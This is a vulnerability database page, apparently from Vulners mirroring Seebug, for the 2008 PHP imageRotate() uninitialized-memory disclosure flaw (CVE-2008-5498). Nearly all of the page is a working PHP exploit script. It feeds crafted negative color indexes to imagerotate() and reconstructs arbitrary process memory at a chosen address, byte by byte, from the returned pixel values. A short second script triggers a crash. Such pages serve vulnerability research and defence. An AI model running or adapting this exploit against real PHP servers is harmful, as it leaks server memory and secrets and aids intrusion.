Lucene search

K

PHP imageRotate()未初始化内存信息泄露漏洞

🗓️ 30 Dec 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 38 Views

PHP imageRotate() memory leak vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
Veracode
Information Disclosure
10 Apr 202000:31
veracode
CVE
CVE-2008-5498
26 Dec 200820:30
cve
Slackware Linux
php
7 Apr 200923:29
slackware
NVD
CVE-2008-5498
26 Dec 200820:30
nvd
OpenVAS
FreeBSD Ports: php5-gd
7 Jan 200900:00
openvas
OpenVAS
FreeBSD Ports: php5-gd
7 Jan 200900:00
openvas
OpenVAS
PHP 'imageRotate()' Memory Information Disclosure Vulnerability
31 Dec 200800:00
openvas
OpenVAS
Slackware Advisory SSA:2009-098-02 php
11 Sep 201200:00
openvas
OpenVAS
Slackware: Security Advisory (SSA:2009-098-02)
10 Sep 201200:00
openvas
OpenVAS
SLES10: Security update for PHP5
13 Oct 200900:00
openvas
Rows per page

                                                <?php 
/* 
edi = src 
esi = clrBack ( -205923 for core_globals safe mode ( 0x IF APR SM MQS)
sample: 0x01 00 SM 00 ) 

( 
            zend_bool
magic_quotes_sybase;                               MQS 
            zend_bool safe_mode;                                     SM 
            zend_bool allow_call_time_pass_reference;               APR 
            zend_bool
implicit_flush;                                            IF 
) 

0x080ed27f <php_gd_gdImageSkewX+1135>:  mov    0x10(%edi,%esi,4),%ebx 
mov ebx, [edi+esi*4+10] 

test case: 
edi = 0x084c6128 
esi = 0xffee07b1(-1177679) values less than this will crash. 
=> 
ebx = 0x8047ff6 

if (a>127) { 
            a = 127; 
} 
:( since alpha blending is on by default, the 32th bit of dumped address cant be detected. 
*/ 
$debug = 0; 
$address = hexdec($argv[1]); 
$addressSave = $address; 
$count = $argv[3]+1; 
$mode = $argv[2]; 
$src = 0x84cde2c; 
$s = 10; //image size 

$GLOBALS["image"]=imagecreate($s,$s); 
$r = $GLOBALS["image"]; 
if( $debug ) 
            echo "Image created.\n"; 


function getDataFromImage( $index ) { 
            $tmp = imagerotate ($GLOBALS["image"],5,$index); 
            return imagecolorat( $tmp, 0,0); 
} 

$eor = 0; 
while( $address < $addressSave+$count*4 ) { 
            // indexes 
            $index_b = (int)(($src - $address + 0x810)/4); 
            $index_g = $index_b + 256; 
            $index_r = $index_b + 512; 
            $index_a = $index_b - 1034; 
            //$index_gG is the same as index of r 
            $index_gR = $index_g + 512; 
            //$index_rG is the same as index of gR 
            //$index_gGg is the same as index of gR 

            // fuctions 
            $f_b = getDataFromImage( -$index_b ); 
            $f_g = getDataFromImage( -$index_g ); 
            $f_r = getDataFromImage( -$index_r ); 
            $f_a = getDataFromImage( -$index_a ); 
            $f_gR = getDataFromImage( -$index_gR ); 
/
            /********************* Byte 1 **********************/ 

            // b byte 1 
            $byte_b1 =  $f_b & 0x000000ff; 
            if( $debug ) 
                        printf( "b:1-0x%x\n", $byte_b1 ); 

            //g byte 1 
            $byte_g1 =  $f_g & 0x000000ff; 
            if( $debug ) 
                        printf( "g:1-0x%x\n", $byte_g1 ); 

            //r byte 1 
            $byte_r1 =  $f_r& 0x000000ff; 
            if( $debug ) 
                        printf( "r:1-0x%x\n", $byte_r1 ); 

            //a byte 1 
            $byte_a1 =  $f_a & 0x000000ff; 
            if( $debug ) 
                        printf( "a:1-0x%x\n\n", $byte_a1 ); 

            /* Relative */ 

            // gG byte 1 
            // this is relative g to `g`( suppose that 'g' is a b). so its right at the position of r. 
            $byte_gG1 =  $byte_r1; 

            // gR byte 1 
            // this is relative r to `g`( suppose that 'g' is a b) 
            $byte_gR1 =  $f_gR & 0x000000ff; 

            // rG byte 1 
            // this is relative g to r( suppose that 'r' is a b) 
            $byte_rG1 =  $byte_gR1; 

            /* 2 Level Relative */ 

            // gGg byte 1 
            // this is relative g to `gG`( suppose that 'gG' is a b) 
            $byte_gGg1 =  $byte_gR1; 

            /********************* Byte 2 **********************/ 

            // b byte 2 
            $sum_b2_g1 =  (($f_b & 0x0000ff00) >> 8 ); 
            $byte_b2 = $sum_b2_g1 - $byte_g1; 
            $borrow_b2 = 0; 
            if( $byte_b2 < 0 ) 
                        $borrow_b2 = 1; 
            $byte_b2 = $byte_b2 & 0x000000ff; 
            if( $debug ) 
                        printf( "b:2-0x%x  \t0x%x\n", $byte_b2, $f_b ); 

            // g byte 2 

            $sum_g2_gG1 =  (($f_g & 0x0000ff00) >> 8 ); 
            $byte_g2 = $sum_g2_gG1 - $byte_gG1; 
            $borrow_g2 = 0; 
            if( $byte_g2 < 0 ) 
                        $borrow_g2 = 1; 
            $byte_g2 = $byte_g2 & 0x000000ff; 
            if( $debug ) 
                        printf( "g:2-0x%x  \t0x%x\n", $byte_g2, $f_gG1 ); 

            // r byte 2 
            $sum_r2_rG1 =  (($f_r& 0x0000ff00) >> 8 ); 
            $byte_r2 = $sum_r2_rG1 - $byte_rG1; 
            $byte_r2 = $byte_r2 & 0x000000ff; 
            if( $debug ) 
                        printf( "r:2-0x%x  \t0x%x\n\n", $byte_r2 ,$sum_r2_rG1 ); 

            /* Relative */ 

            // gG byte 2 
            $byte_gG2 = $byte_r2; 

            /********************* Byte 3 **********************/ 

            // b byte 3 
            $sum_b3_g2_r1_br2 =  (($f_b & 0x00ff0000) >> 16 ); 
            $sum_b3_g2_r1 = $sum_b3_g2_r1_br2 - $borrow_b2; 
            $sum_b3_g2 =  $sum_b3_g2_r1 - $byte_r1; 
            $byte_b3 = $sum_b3_g2 - $byte_g2; 
            $borrow_b3 = 0; 
            if( $byte_b3 < 0 ) 
            { 
                        $borrow_b3 = (int)(-$byte_b3 / 0xff) + 1; //for borrows more than one 
                        if( $debug ) 
                                    printf( "\nborrow was: %d\n" $borrow_b3 ); 
            } 
            $byte_b3 = $byte_b3 & 0x000000ff; 
            if( $debug ) 
                        printf( "b:3-0x%x  \t0x%x\n", $byte_b3,$sum_b3_g2 ); 

            // g byte 3 
            $sum_g3_gG2_gR1_br2 =  (($f_g & 0x00ff0000) >> 16 ); 
            $sum_g3_gG2_gR1 = $sum_g3_gG2_gR1_br2 - $borrow_g2; 
            $sum_g3_gG2 = $sum_g3_gG2_gR1 - $byte_gR1; 
            $byte_g3 = $sum_g3_gG2 - $byte_gG2; 
            $byte_g3 = $byte_g3 & 0x000000ff; 
            if( $debug ) { 
                        printf( "f_g: 0x%x\n" , $f_g); 
                        printf( "sum_g3_gG2_gR1_br2: 0x%x\n" , $sum_g3_gG2_gR1_br2 ); 

                        printf( "sum_g3_gG2_gR1: 0x%x\n" ,$sum_g3_gG2_gR1 ); 
                        printf( "sum_g3_gG2: 0x%x\n" , $sum_g3_gG2 ); 
                        printf( "g:3-0x%x  \t0x%x\n\n", $byte_g3,$sum_b3_g2 ); 
            } 

            /********************* Byte 4 **********************/ 

            // b byte 4 
            $sum_b4_g3_r2_a1_br3 =  (($f_b & 0xff000000) >> 24 ); 
            $sum_b4_g3_r2_a1 = $sum_b4_g3_r2_a1_br3 - $borrow_b3; 
            $sum_b4_g3_r2 =  $sum_b4_g3_r2_a1 - $byte_a1; 
            $sum_b4_g3 = $sum_b4_g3_r2 - $byte_r2; 
            $byte_b4 = $sum_b4_g3 - $byte_g3; 
            $byte_b4 = $byte_b4 & 0x000000ff; 
            if( $debug ) { 
                        printf( "f_b: 0x%x\n" , $f_b); 
                        printf( "sum_b4_g3_r2_a1_br3: 0x%x\n" ,$sum_b4_g3_r2_a1_br3 ); 
                        printf( "sum_b4_g3_r2_a1: 0x%x\n" ,$sum_b4_g3_r2_a1 ); 
                        printf( "sum_b4_g3_r2: 0x%x\n" , $sum_b4_g3_r2 ); 
                        printf( "sum_b4_g3: 0x%x\n" , $sum_b4_g3 ); 
                        printf( "b:4-0x%x\n\n", $byte_b4); 
            } 
            /********************* Byte **********************/ 

            if($mode == 0) {  //text mode 
                        printf( "%c%c%c%c", $byte_b1, $byte_b2,$byte_b3, $byte_b4); 
            } elseif( $mode == 1) { 
                        // b 
                        if( !$eor ) 
                                    printf( "0x%x:\t", $address ); 
                        printf("0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t0x%x(%c)\t", $byte_b1, $byte_b1, 
                                                                                                                       
   $byte_b2, $byte_b2, 
                                                                                                                       
   $byte_b3, $byte_b3, 
                                                                                                                       
   $byte_b4, $byte_b4 ); 

                        $eor = !$eor; 
                        if( !$eor ) 
                                    echo "\n"; 
            } else { 
                        $val = ($byte_b4 << 24) + ($byte_b3 << 16) +($byte_b2 << 8) + $byte_b1; 
                        printf( "0x%x: 0x%x\n", $address, $val ); 
            } 
            $address+=4; 
} 
?> 


<?php
$img = imagecreate(5,5);
$tmp = imagerotate ($img,5,-9999999);
?>


                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Dec 2008 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.015
38
.json
Report